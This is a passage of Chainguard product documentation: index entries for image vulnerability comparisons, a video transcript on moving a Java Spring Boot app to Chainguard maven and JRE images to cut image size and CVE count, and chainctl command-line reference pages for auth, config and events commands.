Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: opensearch URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/opensearch/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: php URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/php/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: postgres URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/postgres/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: python URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/python/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: r-base URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/r-base/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: rabbitmq URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/rabbitmq/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: redis URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/redis/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: ruby URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/ruby/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: rust URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/rust/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: telegraf URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/telegraf/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: traefik URL: 
https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/traefik/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: wait-for-it URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/wait-for-it/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: wolfi-base URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/wolfi-base/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: zookeeper URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/zookeeper/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### How to Migrate a Java Application to Chainguard Containers URL: https://edu.chainguard.dev/chainguard/migration/migration-guides/java-images/ Last Modified: April 2, 2024 Tools used in this video Docker Resources Blog on bootstrapping Java in Wolfi Learning Labs Git repository with code used in demo Transcript Okay, I want to give a quick overview of how to use the Chainguard Java images. And in particular, I want to show how to port an existing application to use the Chainguard Java images. So our images are largely equivalent to the existing Java images that you can find on the Docker Hub, such as the Eclipse Temurin ones. The difference is that we’re much more focused on producing minimal images with a low CVE count. We do build our own JDK and there’s a really great blog on the Chainguard site that explains how we do this and how we bootstrap from the really early versions of Java, which I thoroughly recommend checking out and I will link in the notes. For this video I’m going to use an example created by my colleague Mauren Berti, so all the hard work in this video is actually down to her. So the starting point for this video is this example app. It’s a Spring Boot app and all it does is listen on port 8080 and return “Hello world” effectively. So here is the Dockerfile and we can see it starts with FROM maven. So this is using the Docker official image for maven which itself is built on top of Eclipse Temurin. All we’re doing then is copying over some source code, building it with maven, doing a little bit of cleanup on this step to get rid of some build artifacts and then we’re copying the jar file to the app directory and setting an entrypoint. So we should be able to build that fairly easily and now I should be able to run it. That was pretty quick because it was cached already. If you build it yourself it will take a little bit longer because it will have to download all the various dependencies. So let’s see if I can get this right. docker run --rm -d --port 8080 to port 8080 on the host. Image was called java-maven. So now hopefully if I do curl localhost:8080/hello I get “Hello world” back. So that’s the application working. We can take a look at the logs if we like. Okay nothing surprising there. It’s a Tomcat application. So if we look at the size of the image we can see it’s 585 megabytes. So quite a large container but nothing too surprising for a Java image. If we look at the CVEs – I’m going to use Docker Scout, use grype or whatever – then you can see Docker Scout is reporting there’s 10 medium and 17 low CVEs. Honestly I don’t think it’s a terrible result but let’s see if we can do better. 
So let’s take a look at this Dockerfile and what I’m going to do here is change to use cgr.dev/chainguard/maven. So that’s using the cgr.dev, Chainguard’s registry. You could just delete the cgr.dev and use the Docker Hub because we now have Chainguard images on the Docker Hub under the Chainguard workspace. But let’s just do that for the minute and we will rebuild it. This time I’ll add “cg” on the end so we can see the difference. And there we go. So let’s take a look at java-maven-cg. So I think we are 585 megabytes. So we’ve dropped it by 220 megabytes or 225 megabytes to 360 megabytes. So that’s a fairly big saving by just making – just adding – cgr.dev/chainguard to the start. But more interestingly what happens to the CVEs? So if I run Docker Scout on this image we see there’s zero CVEs. So I’ve made a very small change and we’ve dropped the size of the image and we’ve removed all the known CVEs. So that’s a pretty effective change in my book. But we can still take it further. I’m going to use Mauren’s hard work and we’ll look at how you can create a multi-stage Docker build. I’ve done docker reset. I meant to do git reset. Okay. git switch to the Chainguard multi-stage JRE image. And if we look at the Dockerfile and what we now have is a multi-stage build. So we’re using the maven image as a builder. So we’ve got this “as builder” step but now we’ve got a second build step down here where we say “as runner”. So this code is more or less the same. We have taken out the entrypoint but now we’re copying the jar file from the builder and running it here. And this image is just a JRE image. So it doesn’t have all the build tooling associated with the maven image. Okay let’s try building that. That looks good. So if I do… well I guess we should prove it still works. So if I do docker run. I’ll do docker ps first. docker rm -f 12 Now if I do docker run again. So java-maven-multi-chainguard. curl localhost 8080/hello So still working just the same as before but now java-maven-multi-cg – we can see we’ve got the size down a little bit further. So I think it was what 360 megabytes and now we’ve got it down to 325 megabytes. So we’ve removed 35 megabytes of build tooling in there. And also if we check the CVEs again hopefully that will still be zero. Yeah, so zero CVEs but we’ve reduced the size and number of packages in the image. So that’s quite a big win. Took a little bit more work to get to the multi-stage build but not a ridiculous amount. So that’s about it. We’ve seen how you can use Chainguard’s maven and JRE images to reduce the size and CVE count in a Java application with relatively little work. Please do take a look and let me know how you get on. --- ### chainctl URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl Chainguard Control chainctl [flags] Options --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. -h, --help help for chainctl --issuer string The url of the Chainguard STS endpoint. 
(default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl auth - Auth related commands for the Chainguard platform. chainctl config - Local config file commands for chainctl. chainctl events - Events related commands for the Chainguard platform. chainctl iam - IAM related commands for the Chainguard platform. chainctl images - Images related commands for the Chainguard platform. chainctl libraries - Ecosystem library related commands. chainctl packages - Interact with Chainguard packages chainctl update - Update chainctl. chainctl version - Prints the version --- ### chainctl auth URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_auth/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl auth Auth related commands for the Chainguard platform. Options -h, --help help for auth Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl - Chainguard Control chainctl auth configure-docker - Configure a Docker credential helper chainctl auth login - Login to the Chainguard platform. chainctl auth logout - Logout from the Chainguard platform. chainctl auth pull-token - Create a pull token. chainctl auth status - Inspect the local Chainguard Token. chainctl auth token - Print the local Chainguard Token. --- ### chainctl auth configure-docker URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_auth_configure-docker/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl auth configure-docker Configure a Docker credential helper chainctl auth configure-docker [flags] Options --headless Skip browser authentication and use device flow. -h, --help help for configure-docker --identity string The unique ID of the identity to assume when logging in. --identity-provider string The unique ID of the customer managed identity provider to authenticate with --identity-token string Use an explicit passed identity token or token path. --name string Optional name for the pull token (default "pull-token") --org-name string Organization to use for authentication. If configured the organization's custom identity provider will be used --parent string The IAM organization or folder with which the pull-token identity is associated. --pull-token Whether to register a pull token that can pull images --save If true with --pull-token, save the pull token to the Docker config --ttl duration For how long a generated pull-token will be valid. (default 720h0m0s) Options inherited from parent commands --api string The url of the Chainguard platform API. 
(default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl auth - Auth related commands for the Chainguard platform. --- ### chainctl auth login URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_auth_login/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl auth login Login to the Chainguard platform. chainctl auth login [--invite-code=INVITE_CODE] [--identity-token=PATH_TO_TOKEN] [--identity=IDENTITY_ID] [--identity-provider=IDP_ID] [--org-name=ORG_NAME] [--social-login={google|github|gitlab}] [--headless] [--prefer-ambient-credentials] [--refresh] [--output=id|json|none|table] Examples # Default auth login flow: chainctl auth login # Refreshing a token within a Kubernetes context: chainctl auth login --identity-token=PATH_TO_TOKEN --refresh # Headless login using --org-name chainctl auth login --headless --org-name my-org # Register by accepting an invite to an existing location chainctl auth login --invite-code eyJncnAiOiI5MzA... Options --headless Skip browser authentication and use device flow. -h, --help help for login --identity string The unique ID of the identity to assume when logging in. --identity-provider string The unique ID of the customer managed identity provider to authenticate with --identity-token string Use an explicit passed identity token or token path. --invite-code string Registration invite code. --org-name string Organization to use for authentication. If configured the organization's custom identity provider will be used --prefer-ambient-credentials Auth with ambient credentials, if present, before using a supplied identity token. --refresh Enable auto refresh of the Chainguard token (for workloads). --skip-browser Skip opening a browser for login --social-login string Which of the default identity providers to use for authentication. Must be one of: google, github, gitlab --sts-http1-downgrade Downgrade STS requests to HTTP/1.x --validate Validates token after exchange (default true) Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. 
SEE ALSO chainctl auth - Auth related commands for the Chainguard platform. --- ### chainctl auth logout URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_auth_logout/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl auth logout Logout from the Chainguard platform. chainctl auth logout [--audience=AUDIENCE] Options -h, --help help for logout Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl auth - Auth related commands for the Chainguard platform. --- ### chainctl auth pull-token URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_auth_pull-token/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl auth pull-token Create a pull token. chainctl auth pull-token [--output=env|json] [flags] Options -h, --help help for pull-token --library-ecosystem string The language ecosystem to create this pull token for (e.g. python, java). --name string Optionally set the name for the token (default "pull-token") --parent string The IAM organization or folder with which the pull-token identity is associated. --save If true with --pull-token, save the pull token to the Docker config --ttl duration For how long a generated pull-token will be valid. (default 720h0m0s) Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl auth - Auth related commands for the Chainguard platform. --- ### chainctl auth status URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_auth_status/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl auth status Inspect the local Chainguard Token. chainctl auth status [--output=json|table|terse] [flags] Options -h, --help help for status --identity-token string Use an explicit passed identity token or token path. --quick Whether to perform quick offline token checks (vs. calling the Validate API). 
Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl auth - Auth related commands for the Chainguard platform. --- ### chainctl auth token URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_auth_token/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl auth token Print the local Chainguard Token. chainctl auth token [flags] Options -h, --help help for token Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl auth - Auth related commands for the Chainguard platform. --- ### chainctl config URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_config/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl config Local config file commands for chainctl. Options -h, --help help for config Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl - Chainguard Control chainctl config edit - Edit the current chainctl config file. chainctl config reset - Remove local chainctl config files and restore defaults. chainctl config save - Save the current chainctl config to a config file. chainctl config set - Set an individual configuration value property. 
chainctl config unset - Unset a configuration property and return it to default. chainctl config validate - Run diagnostics on local config. chainctl config view - View the current chainctl config. --- ### chainctl config edit URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_config_edit/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl config edit Edit the current chainctl config file. Synopsis Edit the current chainctl config file. Use the environment variable EDITOR to set the path to your preferred editor (default: nano). chainctl config edit [--config FILE] [--yes] [flags] Options -h, --help help for edit -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl config - Local config file commands for chainctl. --- ### chainctl config reset URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_config_reset/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl config reset Remove local chainctl config files and restore defaults. chainctl config reset [--yes] Options -h, --help help for reset -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl config - Local config file commands for chainctl. --- ### chainctl config save URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_config_save/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl config save Save the current chainctl config to a config file. chainctl config save [--config FILE] [--yes] [flags] Options -h, --help help for save -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. 
(default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl config - Local config file commands for chainctl. --- ### chainctl config set URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_config_set/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl config set Set an individual configuration value property. Synopsis Set an individual configuration value property. Property names are dot delimited and lowercase (for example, output.color.pass). chainctl config set PROPERTY_NAME PROPERTY_VALUE Examples # Set the api URL chainctl config set platform.api https://console-api.enforce.dev Options -h, --help help for set Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl config - Local config file commands for chainctl. --- ### chainctl config unset URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_config_unset/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl config unset Unset a configuration property and return it to default. Synopsis Unset a configuration property and return it to default. Property names are dot delimited and lowercase (for example, output.color.pass). chainctl config unset PROPERTY_NAME Examples # Return the pass color to its default chainctl config unset output.color.pass Options -h, --help help for unset Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. 
(default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl config - Local config file commands for chainctl. --- ### chainctl config validate URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_config_validate/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl config validate Run diagnostics on local config. chainctl config validate [--output=json|table] [flags] Options -h, --help help for validate Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl config - Local config file commands for chainctl. --- ### chainctl config view URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_config_view/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl config view View the current chainctl config. chainctl config view [--diff] [flags] Options --diff Show the difference between the local config file and the active configuration. -h, --help help for view Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl config - Local config file commands for chainctl. --- ### chainctl events URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_events/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl events Events related commands for the Chainguard platform. Options -h, --help help for events Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. 
--console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl - Chainguard Control chainctl events subscriptions - Subscription interactions. --- ### chainctl events subscriptions URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_events_subscriptions/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl events subscriptions Subscription interactions. Options -h, --help help for subscriptions Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl events - Events related commands for the Chainguard platform. chainctl events subscriptions create - Subscribe to events under an organization or folder. chainctl events subscriptions delete - Delete a subscription. chainctl events subscriptions list - List subscriptions. --- ### chainctl events subscriptions create URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_events_subscriptions_create/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl events subscriptions create Subscribe to events under an organization or folder. chainctl events subscriptions create SINK_URL [--parent ORGANIZATION_NAME | ORGANIZATION_ID | FOLDER_NAME | FOLDER_ID] [--yes] [--output=id|json|table] Options -h, --help help for create --parent string The parent location name or id of the subscription. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl events subscriptions - Subscription interactions. 
--- ### chainctl events subscriptions delete URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_events_subscriptions_delete/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl events subscriptions delete Delete a subscription. chainctl events subscriptions delete SUBSCRIPTION_ID [--yes] [--output=id] [flags] Options -h, --help help for delete -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl events subscriptions - Subscription interactions. --- ### chainctl events subscriptions list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_events_subscriptions_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl events subscriptions list List subscriptions. chainctl events subscriptions list [--parent ORGANIZATION_NAME | ORGANIZATION_ID | FOLDER_NAME | FOLDER_ID] [--output=id|json|table] Options -h, --help help for list --parent string The parent location name or id of the subscription. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl events subscriptions - Subscription interactions. --- ### chainctl iam URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam IAM related commands for the Chainguard platform. Options -h, --help help for iam Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. 
